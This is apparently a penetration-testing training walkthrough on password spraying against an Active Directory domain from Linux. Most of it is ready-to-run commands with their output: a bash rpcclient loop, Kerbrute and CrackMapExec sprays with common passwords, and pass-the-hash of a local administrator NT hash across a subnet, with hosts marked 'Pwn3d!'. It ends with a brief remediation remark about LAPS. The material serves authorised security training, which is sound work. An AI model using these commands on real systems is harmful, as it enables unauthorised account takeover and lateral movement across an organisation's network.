Internal Spraying - Linux
Rpcclient with this Bash one-liner (adapted from here) can be used to perform the attack.
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
We can also use Kerbrute for the same attack.
neutron@kali[/kali]$ kerbrute passwordspray -d legalcorp.local --dc 172.16.5.5 valid_users.txt Welcome1
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 02/17/22 - Ronnie Flathers @ropnop
2022/02/17 22:57:12 > Using KDC(s):
2022/02/17 22:57:12 > 172.16.5.5:88
2022/02/17 22:57:12 > [+] VALID LOGIN: [email protected]:Welcome1
2022/02/17 22:57:12 > Done! Tested 57 logins (1 successes) in 0.172 seconds
There are multiple other methods for performing password spraying from Linux.
Using CrackMapExec & Filtering Logon Failures
neutron@kali[/kali]$ sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] legalcorp.local\avazquez:Password123
CrackMapExec to validate the credentials quickly against a Domain Controller.
neutron@kali[/kali]$ sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:legalcorp.local) (signing:True) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] legalcorp.local\avazquez:Password123
Local Administrator Password Reuse
Sometimes we may only retrieve the NTLM hash for the local administrator account from the local SAM database. In these instances, we can spray the NT hash across an entire subnet. The --local-auth flag will tell the tool only to attempt to log in one time on each machine which removes any risk of account lockout.
neutron@kali[/kali]$ sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +
SMB 172.16.5.50 445 ACADEMY-EA-MX01 [+] ACADEMY-EA-MX01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB 172.16.5.25 445 ACADEMY-EA-MS01 [+] ACADEMY-EA-MS01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB 172.16.5.125 445 ACADEMY-EA-WEB0 [+] ACADEMY-EA-WEB0\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
We could then move to enumerate each system to see if we can find anything that will help further our access.
This technique, while effective, is quite noisy and is not a good choice for any assessments that require stealth. It is always worth looking for this issue during penetration tests, even if it is not part of our path to compromise the domain, as it is a common issue and should be highlighted for our clients. One way to remediate this issue is using the free Microsoft tool Local Administrator Password Solution (LAPS).